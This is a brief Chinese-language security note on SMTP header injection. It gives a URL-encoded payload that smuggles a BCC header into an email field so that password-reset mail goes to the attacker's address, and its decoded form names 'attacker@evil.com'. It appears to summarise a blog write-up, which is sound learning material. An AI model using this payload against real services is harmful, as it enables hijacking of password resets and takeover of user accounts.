原Blog: http://blog.jr0ch17.com/2018/Please-email-me-your-password/
思路:
利用SMTP頭注入,將攻擊者email地址添加爲CC或BCC,從而劫持到比如找回密碼郵件(需要目標業務未對郵件地址做校驗就發郵件,利用場景有限)
Payload:
valid_user_address%40company.com%0D%0ABCC%3Ame%40me.com%0D%0A
解析後的結果是:
valid_user_address@company.com
BCC:attacker@evil.com